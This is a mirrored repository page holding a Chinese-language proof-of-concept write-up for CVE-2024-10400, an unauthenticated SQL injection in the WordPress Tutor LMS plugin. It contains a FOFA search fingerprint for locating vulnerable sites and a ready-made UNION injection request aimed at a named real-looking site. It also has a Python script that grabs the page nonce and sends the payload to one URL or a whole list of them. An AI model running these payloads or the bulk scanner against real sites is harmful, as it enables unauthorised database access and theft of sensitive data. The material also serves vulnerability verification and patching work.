admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/WordPress/WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400).md

98 lines
3.6 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400)
WordPress 的 Tutor LMS 插件在 2.7.6 及 2.7.6 之前的所有版本中存在通过 “rating_filter ”参数进行 SQL 注入的漏洞,原因是用户提供的参数未进行充分的转义处理,而且现有的 SQL 查询也未进行预编译。这使得未经认证的攻击者有可能在已有的查询中附加额外的 SQL 查询,从而从数据库中提取敏感信息。
## fofa
```javascript
body="/wp-content/plugins/tutor/"
```
## poc
```javascript
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: academy.keune.ch
Content-Type: application/x-www-form-urlencoded
action=load_filtered_instructor&_tutor_nonce=56803fc221&rating_filter=1e0+and+1=0+Union+select+1,2,3,4,5,6,7,8,9,concat(0x7e,user(),0x7e),11,12,14--+-
```
访问网站查看源码获取_tutor_nonce的参数
![image-20241227220244898](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272202950.png)
![image-20241227220301165](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272203238.png)
## python脚本
```python
import requests
import urllib3
from urllib.parse import urljoin
import argparse
import ssl
import re
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def read_file(file_path):
with open(file_path, 'r') as file:
return file.read().splitlines()
def check_sql_injection(url):
target_url = url.rstrip("/")
target_url_tutor_nonce = urljoin(target_url, "")
print(target_url_tutor_nonce)
target_endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php")
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15",
"Content-Type": "application/x-www-form-urlencoded"
}
tutor_nonce = None
try:
response = requests.get(target_url_tutor_nonce, verify=False, headers=headers, timeout=15)
match = re.search(r'"_tutor_nonce":"(\w+)"', response.text)
if match:
tutor_nonce = match.group(1)
print(f"\033[32mFound_tutor_nonce: {tutor_nonce}\033[0m")
if tutor_nonce:
payloads = f"action=load_filtered_instructor&_tutor_nonce={tutor_nonce}&rating_filter=1e0+and+1=0+Union+select+111,2222,3333,4,5,6,7,8,9,concat(md5(123321),version()),11,12,14--+-"
response = requests.post(target_endpoint, verify=False, headers=headers, timeout=15, data=payloads)
if response.status_code == 200 and all(key in response.text for key in ['c8837b23ff8aaa8a2dde915473ce099110']):
print(f"\033[31mFind: {url}: WordPress_CVE-2024-10400_sql_Injection!\033[0m")
return True
except requests.RequestException as e:
print(f"Error checking {url}: {e}")
return False
def main():
parser = argparse.ArgumentParser(description="Check for SQL injection vulnerabilities.")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-u", "--url", help="Target URL")
group.add_argument("-f", "--file", help="File containing URLs")
args = parser.parse_args()
if args.url:
check_sql_injection(args.url)
elif args.file:
urls = read_file(args.file)
for url in urls:
check_sql_injection(url)
if __name__ == "__main__":
main()
```
## 漏洞来源
- https://github.com/iSee857/CVE-PoC/blob/d6dc0f2baa9e65ae8d277f9e67086dc2f4bd72ac/WordPress_CVE-2024-10400_sql_Injection.py#L42
Reference in New Issue Copy Permalink